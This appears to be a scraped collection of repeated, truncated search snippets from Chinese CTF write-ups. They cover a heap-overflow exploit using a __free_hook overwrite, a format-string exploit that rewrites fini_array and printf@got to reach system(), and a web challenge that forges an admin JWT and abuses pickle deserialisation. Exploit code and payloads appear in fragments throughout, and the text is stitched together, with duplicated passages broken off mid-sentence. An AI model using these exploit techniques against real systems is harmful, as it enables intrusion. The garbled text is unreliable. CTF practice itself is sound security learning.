add(0x88,b"a"*0x80+p64(0x4c0))# 0 dele(2) add(0x420)# 1 m=show(0) libc_base=u64_ex(m)-0x3ebca0 log_libc_base_addr(libc_base) libc.address=libc_base add(0x80)# 2 dele(0) dele(2) add(0x80,p64(libc.sym['__free_hook'])) add(0x80) add(0x80,p64(libc_base+li...
ciscn_2019_sw_7 堆溢出与整数溢出漏洞 一般再libc-2.27.so的库中,如果限制了大小,那么基本上只有两种方法,一种是orange,还有一种就是堆溢出,然后修改size大小为unsorted bin中的大小来leak libc。 由于本题有堆溢出,但限制了堆的大小,所以我们想泄露libc,只能使用后者(因为申请的chunk大小被限制了),而在有tache...
完整exp# frompwnimport*sh = process("./ciscn_2019_sw_1")# 往fini.array[0]写main@text, printf@got写system@pltpayload =b"%2052c%13$hn%31692c%14$hn%356c%15$hn"+ p32(0x804989c+2) + p32(0x804989c) + p32(0x804979c)sh.recvline()sh.sendline(payload)sleep(1)sh.sendline("/...
ciscn_2019_sw_1 思路 通过格式化字符串是程序无限循环(__do_global_dtors_aux_fini_array_entry内存的地址写成main函数地址) 我们是通过libc_start_main调用main函数不管是在man函数调用前后都会调用fini函数的指针所以只要将其写坏即可然后将print_got表写成system即可拿到shell exp:...ciscn_2019_sw_7 思路 堆...
ciscn_2019_sw_1 总结 根据本题,学习与收获有: 当RELRO保护为NO RELRO的时候,init.array、fini.array、got.plt均可读可写;为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写;为FULL RELRO时,init.array、fini.array、got.plt均可读不可写。
ciscn_2019_sw_1 思路 通过格式化字符串是程序无限循环(__do_global_dtors_aux_fini_array_entry内存的地址写成main函数地址) 我们是通过libc_start_main调用main函数不管是在man函数调用前后都会调用fini函数的指针所以只要将其写坏即可然后将print_got表写成system即可拿到shell exp:... ciscn_2019_sw_7 思路 ...
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo 修改签名后重放一下,看到提示www.zip源码泄露 获取源码后打开,注意到Admin.py文件 importtornado.webfromsshop.baseimportBaseHandlerimportpickleimporturllibclassAdminHandler(BaseHandler):...
ciscn_2019_sw_7 堆溢出与整数溢出漏洞 一般再的库中,如果限制了大小,那么基本上只有两种方法,一种是orange,还有一种就是堆溢出,然后修改size大小为unsorted bin中的大小来leak libc。 由于本题有堆溢出,但限制了堆的大小,所以我们想泄露libc,只能使用后者(因为申请的chunk大小被限制了),而在有tache的情况下,要...
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo 回到Burp里,生成,有反应了,让我一键成为大会员,点完没反应 不急,看看F12,发现源码的下载地址,/static/asd1f654e683wq/www.zip ...
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo 然后放包,看到我们已经成为大会员 在源码里我们可以找到一个压缩包,先下载下来 然后找到反序列化admin.py,有漏洞,用脚本构造become ...